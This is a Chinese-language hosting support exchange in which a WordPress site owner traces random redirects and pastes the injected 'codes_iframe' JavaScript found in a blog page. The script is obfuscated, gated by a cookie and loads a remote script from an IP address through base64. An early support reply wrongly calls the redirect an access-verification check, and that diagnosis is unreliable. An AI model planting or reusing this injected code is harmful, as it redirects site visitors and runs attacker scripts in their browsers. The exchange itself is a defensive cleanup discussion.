問:這個wordpress用的正版主題和插件。
在訪問過程中,偶爾瀏覽時,跳轉到newsforyou.pro 這個網站。
大概過5天,出現過兩次。
我就不知道是否是掛馬,還是有病毒,請排查一下,謝謝。
,懷疑網站中病毒了,請排查一下。
答:您好
我們檢查主機正常,多次訪問也并未出現跳轉的情況,請問是在什么情況下出現跳轉的,比如是做什么操作嗎?,非常感謝您長期對我司的支持.由此給您帶來的不便之處,敬請原諒!謝謝!
問:沒在主頁,瀏覽內頁時。
找到從那里跳過去的了,從內頁,這里:
http://www.pandawego.com/blog/animal-bonsai/
然后點一張圖片,就跳了。
答:您好,核實您對應說反饋的情況,其對應跳轉到的地址,其是一個訪問驗證檢查,感覺有點像是對應一個訪問驗證攔截,避免網站訪問頻率過高等情況,該問題請核實一下您對應是否近期有在網站后臺設置什么訪問防護插件等,非常感謝您長期對我司的支持!
問:找到病毒代碼了:
view-source:http://www.pandawego.com/blog/animal-bonsai/
<!–codes_iframe–><script type="text/javascript"> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )" e.replace(/([\\.$?*|{}\\(\\)\\[\\]\\\\\\/\\ ^])/g,"\\\\$1") "=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3 86400),date=new Date((new Date).getTime() 86400);document.cookie="redirect=" time "; path=/; expires=" date.toGMTString(),document.write('<script src="' src '"><\\/script>')} </script><!–/codes_iframe–></p>
在這里。
怎么進一步處理呢?
答:您好
1、找到代碼后請從相應文件中將代碼刪除即可,建議您聯系程序開發商為您協助處理。并讓程序開發商為您修復漏洞,若不修復,仍有被入侵的可能。
2、該問題是程序方面問題,若需我司協助您清理掛馬,請您提交對應工單:【虛擬主機/數據庫問題】—【網站類問題】—【清理網站掛馬代碼和非法信息】,會涉及到費用,另外,我司只能幫您清理掛馬,無法幫您修復漏洞,請您知悉,非常感謝你的支持!
